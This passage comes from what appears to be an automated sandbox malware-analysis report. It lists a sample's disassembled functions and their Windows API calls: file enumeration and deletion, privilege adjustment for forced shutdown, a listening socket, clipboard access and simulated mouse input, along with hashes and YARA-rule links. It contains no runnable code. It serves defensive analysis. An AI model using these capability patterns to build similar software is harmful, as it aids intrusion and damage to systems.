                                                                                                                        • Instruction Fuzzy Hash: 5661BF34204202AFD300EF24D89AF6ABFB4BF95714F14451DF896A72A2DB31DD49DB62
                                                                                                                        Function 0058698F Relevance: 21.4, APIs: 7, Strings: 5, Instructions: 363timefileCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • FindFirstFileW.KERNEL32(?,?), ref: 005869BE
                                                                                                                        • FindClose.KERNEL32(00000000), ref: 00586A12
                                                                                                                        • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00586A4E
                                                                                                                        • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00586A75
                                                                                                                          • Part of subcall function 00519CB3: _wcslen.LIBCMT ref: 00519CBD
                                                                                                                        • FileTimeToSystemTime.KERNEL32(?,?), ref: 00586AB2
                                                                                                                        • FileTimeToSystemTime.KERNEL32(?,?), ref: 00586ADF
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Time$File$FindLocalSystem$CloseFirst_wcslen
                                                                                                                        • String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
                                                                                                                        • API String ID: 3830820486-3289030164
                                                                                                                        • Opcode ID: 941213a7484778ab32e6477e783abb961878883097c990a1b8d03eaa8b0e5402
                                                                                                                        • Instruction ID: 6f7dfe815ac6d371e7caf7b60cfe1a6e556da292a00cf721f621d7a26a54f650
                                                                                                                        • Opcode Fuzzy Hash: 941213a7484778ab32e6477e783abb961878883097c990a1b8d03eaa8b0e5402
                                                                                                                        • Instruction Fuzzy Hash: ECD15F72508301AED314EBA4D895EAFBBECBF88704F04491DF985D7291EB34DA44CB62
                                                                                                                        Function 00589642 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 118fileCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • FindFirstFileW.KERNEL32(?,?,76F88FB0,?,00000000), ref: 00589663
                                                                                                                        • GetFileAttributesW.KERNEL32(?), ref: 005896A1
                                                                                                                        • SetFileAttributesW.KERNEL32(?,?), ref: 005896BB
                                                                                                                        • FindNextFileW.KERNEL32(00000000,?), ref: 005896D3
                                                                                                                        • FindClose.KERNEL32(00000000), ref: 005896DE
                                                                                                                        • FindFirstFileW.KERNEL32(*.*,?), ref: 005896FA
                                                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 0058974A
                                                                                                                        • SetCurrentDirectoryW.KERNEL32(005D6B7C), ref: 00589768
                                                                                                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 00589772
                                                                                                                        • FindClose.KERNEL32(00000000), ref: 0058977F
                                                                                                                        • FindClose.KERNEL32(00000000), ref: 0058978F
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                                                                                                        • String ID: *.*
                                                                                                                        • API String ID: 1409584000-438819550
                                                                                                                        • Opcode ID: 3e2b08dc0ec6f1249e52e93c13f7404d6bfc605f81c451f1b10f59454175141a
                                                                                                                        • Instruction ID: e06b54ad8eba499b6b8a4fe478946e26cd636b6fb4b98312bde7f07f89520740
                                                                                                                        • Opcode Fuzzy Hash: 3e2b08dc0ec6f1249e52e93c13f7404d6bfc605f81c451f1b10f59454175141a
                                                                                                                        • Instruction Fuzzy Hash: C531A03654021A6ADF24AFB5DC49AEE7FACFF4A320F184156F915F21A0EB30DE448B54
                                                                                                                        Function 0058979D Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 111fileCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • FindFirstFileW.KERNEL32(?,?,76F88FB0,?,00000000), ref: 005897BE
                                                                                                                        • FindNextFileW.KERNEL32(00000000,?), ref: 00589819
                                                                                                                        • FindClose.KERNEL32(00000000), ref: 00589824
                                                                                                                        • FindFirstFileW.KERNEL32(*.*,?), ref: 00589840
                                                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00589890
                                                                                                                        • SetCurrentDirectoryW.KERNEL32(005D6B7C), ref: 005898AE
                                                                                                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 005898B8
                                                                                                                        • FindClose.KERNEL32(00000000), ref: 005898C5
                                                                                                                        • FindClose.KERNEL32(00000000), ref: 005898D5
                                                                                                                          • Part of subcall function 0057DAE5: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 0057DB00
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                                                                                                        • String ID: *.*
                                                                                                                        • API String ID: 2640511053-438819550
                                                                                                                        • Opcode ID: af2324613f000af4f34e0b339afbc49c4d921261e59c532d40635e96c8dd665d
                                                                                                                        • Instruction ID: bd9c7d75efeca15d4609e96e3d13370477dbf0bc7207b4d0043f2a5b7b236691
                                                                                                                        • Opcode Fuzzy Hash: af2324613f000af4f34e0b339afbc49c4d921261e59c532d40635e96c8dd665d
                                                                                                                        • Instruction Fuzzy Hash: 5431B23150021A6AEF20BFA4EC48AEE7FACBF46324F184156E954B2190DB30DE498F60
                                                                                                                        Function 00588195 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 186timeCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetLocalTime.KERNEL32(?), ref: 00588257
                                                                                                                        • SystemTimeToFileTime.KERNEL32(?,?), ref: 00588267
                                                                                                                        • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00588273
                                                                                                                        • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00588310
                                                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00588324
                                                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00588356
                                                                                                                        • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 0058838C
                                                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00588395
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CurrentDirectoryTime$File$Local$System
                                                                                                                        • String ID: *.*
                                                                                                                        • API String ID: 1464919966-438819550
                                                                                                                        • Opcode ID: d6cc8b3e27ef4d0c61ede0a983e01e97532d2a048b51cb7c252edefd544a757f
                                                                                                                        • Instruction ID: 7c475f708cf66aeafc0f9aa510feada81e8ccd3ae88b66f64402f6417c7d0f99
                                                                                                                        • Opcode Fuzzy Hash: d6cc8b3e27ef4d0c61ede0a983e01e97532d2a048b51cb7c252edefd544a757f
                                                                                                                        • Instruction Fuzzy Hash: 47619E755043069FD710EF64C8459AEBBE9FF89310F448C1EF98993251EB31E945CB92
                                                                                                                        Function 0057D076 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 172fileCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00513AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00513A97,?,?,00512E7F,?,?,?,00000000), ref: 00513AC2
                                                                                                                          • Part of subcall function 0057E199: GetFileAttributesW.KERNEL32(?,0057CF95), ref: 0057E19A
                                                                                                                        • FindFirstFileW.KERNEL32(?,?), ref: 0057D122
                                                                                                                        • DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 0057D1DD
                                                                                                                        • MoveFileW.KERNEL32(?,?), ref: 0057D1F0
                                                                                                                        • DeleteFileW.KERNEL32(?,?,?,?), ref: 0057D20D
                                                                                                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 0057D237
                                                                                                                          • Part of subcall function 0057D29C: CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,0057D21C,?,?), ref: 0057D2B2
                                                                                                                        • FindClose.KERNEL32(00000000,?,?,?), ref: 0057D253
                                                                                                                        • FindClose.KERNEL32(00000000), ref: 0057D264
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
                                                                                                                        • String ID: \*.*
                                                                                                                        • API String ID: 1946585618-1173974218
                                                                                                                        • Opcode ID: 527ce4704561ca86f3cc44c9910bcd4dcce097dfb58a8c53f663bcab46498b5f
                                                                                                                        • Instruction ID: abb67afadee84401edae6accc36a28799cbe7b2ee976bf676f5319ac9f69929a
                                                                                                                        • Opcode Fuzzy Hash: 527ce4704561ca86f3cc44c9910bcd4dcce097dfb58a8c53f663bcab46498b5f
                                                                                                                        • Instruction Fuzzy Hash: B1617F3180110EAADF05EBE0D9569EDBFB5BF95300F648065E40677192EB316F49EB60
                                                                                                                        Function 0058ED6A Relevance: 13.6, APIs: 9, Instructions: 102clipboardmemoryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1737998785-0
                                                                                                                        • Opcode ID: 40d53d5340cc6b32305873e304a09ba6f718dcd2d885cd50c9533605a6c0aa24
                                                                                                                        • Instruction ID: 2679c957e10afe80cde0d3453917f6397d87073afe060390bf164002e43e7b78
                                                                                                                        • Opcode Fuzzy Hash: 40d53d5340cc6b32305873e304a09ba6f718dcd2d885cd50c9533605a6c0aa24
                                                                                                                        • Instruction Fuzzy Hash: 8941CD35204611AFE320EF19D88AB19BFF5FF55318F14C499E8559B6A2C731EC46CB90
                                                                                                                        Function 0057E8F6 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 57shutdownCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 005716C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0057170D
                                                                                                                          • Part of subcall function 005716C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0057173A
                                                                                                                          • Part of subcall function 005716C3: GetLastError.KERNEL32 ref: 0057174A
                                                                                                                        • ExitWindowsEx.USER32(?,00000000), ref: 0057E932
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                                                                        • String ID: $ $@$SeShutdownPrivilege
                                                                                                                        • API String ID: 2234035333-3163812486
                                                                                                                        • Opcode ID: a99771954b857ff24358e4ebec0add295ba28f475951914c1b531091c3dc5599
                                                                                                                        • Instruction ID: 3d8285020655f0a4da70bace973e2ded67ee0411d300582781ff7b42d04a9a9f
                                                                                                                        • Opcode Fuzzy Hash: a99771954b857ff24358e4ebec0add295ba28f475951914c1b531091c3dc5599
                                                                                                                        • Instruction Fuzzy Hash: 86012B33610311ABEB642678BC8BFBF7E5CB719740F148862FE07E21D1D6605C44A294
                                                                                                                        Function 00591204 Relevance: 12.1, APIs: 8, Instructions: 113networkCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00591276
                                                                                                                        • WSAGetLastError.WSOCK32 ref: 00591283
                                                                                                                        • bind.WSOCK32(00000000,?,00000010), ref: 005912BA
                                                                                                                        • WSAGetLastError.WSOCK32 ref: 005912C5
                                                                                                                        • closesocket.WSOCK32(00000000), ref: 005912F4
                                                                                                                        • listen.WSOCK32(00000000,00000005), ref: 00591303
                                                                                                                        • WSAGetLastError.WSOCK32 ref: 0059130D
                                                                                                                        • closesocket.WSOCK32(00000000), ref: 0059133C
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorLast$closesocket$bindlistensocket
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 540024437-0
                                                                                                                        • Opcode ID: 93cef969da796da19ceebe48d052bfd0765d33f128b678d9899cb982a21ae9fa
                                                                                                                        • Instruction ID: 56d52344c05c3da122d081dace615ef2e542fafc9548844fce2655244f72d4ef
                                                                                                                        • Opcode Fuzzy Hash: 93cef969da796da19ceebe48d052bfd0765d33f128b678d9899cb982a21ae9fa
                                                                                                                        • Instruction Fuzzy Hash: F34190356005129FDB10EF24C488B69BFE6BF86318F188588E8568F2D2C775EC85CBE1
                                                                                                                        Function 0054B952 Relevance: 10.9, APIs: 7, Instructions: 370timeCOMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • _free.LIBCMT ref: 0054B9D4
                                                                                                                        • _free.LIBCMT ref: 0054B9F8
                                                                                                                        • _free.LIBCMT ref: 0054BB7F
                                                                                                                        • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,005B3700), ref: 0054BB91
                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,005E121C,000000FF,00000000,0000003F,00000000,?,?), ref: 0054BC09
                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,005E1270,000000FF,?,0000003F,00000000,?), ref: 0054BC36
                                                                                                                        • _free.LIBCMT ref: 0054BD4B
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _free$ByteCharMultiWide$InformationTimeZone
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 314583886-0
                                                                                                                        • Opcode ID: 87c5870180fdbc500c10aca4dc230557b95ed7eda79566e1e5f61138330b3f44
                                                                                                                        • Instruction ID: 2d4d12c22c48b61d3cb1cb8e2e5b4d89f06f4ee6a5dea2ad1f8547dd8ab00426
                                                                                                                        • Opcode Fuzzy Hash: 87c5870180fdbc500c10aca4dc230557b95ed7eda79566e1e5f61138330b3f44
                                                                                                                        • Instruction Fuzzy Hash: 84C13471A04246ABEB249F3A8C85BEE7FB8FF91318F14459AE590DB251E730CE41D750
                                                                                                                        Function 0057D3A9 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91fileCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00513AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00513A97,?,?,00512E7F,?,?,?,00000000), ref: 00513AC2
                                                                                                                          • Part of subcall function 0057E199: GetFileAttributesW.KERNEL32(?,0057CF95), ref: 0057E19A
                                                                                                                        • FindFirstFileW.KERNEL32(?,?), ref: 0057D420
                                                                                                                        • DeleteFileW.KERNEL32(?,?,?,?), ref: 0057D470
                                                                                                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 0057D481
                                                                                                                        • FindClose.KERNEL32(00000000), ref: 0057D498
                                                                                                                        • FindClose.KERNEL32(00000000), ref: 0057D4A1
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                                                                                        • String ID: \*.*
                                                                                                                        • API String ID: 2649000838-1173974218
                                                                                                                        • Opcode ID: 6cd9c896aa5417fee189a010ad8a69c906f33df74ecdb754ab811d62b1c9ee35
                                                                                                                        • Instruction ID: 4492faea13b5ff97c31ade59f6912fc78f2ee5c62d5d3948ae735cf9f7e6cddb
                                                                                                                        • Opcode Fuzzy Hash: 6cd9c896aa5417fee189a010ad8a69c906f33df74ecdb754ab811d62b1c9ee35
                                                                                                                        • Instruction Fuzzy Hash: 2D315E710083429BD701EF64D8599EFBFF8BEE2310F448E1DF4D552191EB60AA49E762
                                                                                                                        Function 0054E4FF Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: __floor_pentium4
                                                                                                                        • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                                        • API String ID: 4168288129-2761157908
                                                                                                                        • Opcode ID: 2639705a19b7efbfbdc79290edc89de81fa9247dd7d632e2f70ab8793298c6b6
                                                                                                                        • Instruction ID: d7c299d255602201832638ca2b45f1e9c501374821133afc9694ce96cd203bf3
                                                                                                                        • Opcode Fuzzy Hash: 2639705a19b7efbfbdc79290edc89de81fa9247dd7d632e2f70ab8793298c6b6
                                                                                                                        • Instruction Fuzzy Hash: 58C25A72E046298FDB25CE28DD457EABBB5FB84308F1445EAD44EE7241E774AE818F40
                                                                                                                        Function 0058648E Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 367comCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • _wcslen.LIBCMT ref: 005864DC
                                                                                                                        • CoInitialize.OLE32(00000000), ref: 00586639
                                                                                                                        • CoCreateInstance.OLE32(005AFCF8,00000000,00000001,005AFB68,?), ref: 00586650
                                                                                                                        • CoUninitialize.OLE32 ref: 005868D4
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                                                                                        • String ID: .lnk
                                                                                                                        • API String ID: 886957087-24824748
                                                                                                                        • Opcode ID: bbe80efea17fbf0fbc6bb42756f05901a670b9b3a31076152137757bb55c23c2
                                                                                                                        • Instruction ID: 5766b7b8f55e185325d770d0756ba79b2c9bba50ec100200c57fc73ef7d1915b
                                                                                                                        • Opcode Fuzzy Hash: bbe80efea17fbf0fbc6bb42756f05901a670b9b3a31076152137757bb55c23c2
                                                                                                                        • Instruction Fuzzy Hash: C2D15871508202AFD314EF24C8959ABBBE8FFD8304F40496DF5959B291EB31ED46CB92
                                                                                                                        Function 005922DA Relevance: 9.1, APIs: 6, Instructions: 103COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetForegroundWindow.USER32(?,?,00000000), ref: 005922E8
                                                                                                                          • Part of subcall function 0058E4EC: GetWindowRect.USER32(?,?), ref: 0058E504
                                                                                                                        • GetDesktopWindow.USER32 ref: 00592312
                                                                                                                        • GetWindowRect.USER32(00000000), ref: 00592319
                                                                                                                        • mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 00592355
                                                                                                                        • GetCursorPos.USER32(?), ref: 00592381
                                                                                                                        • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 005923DF
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
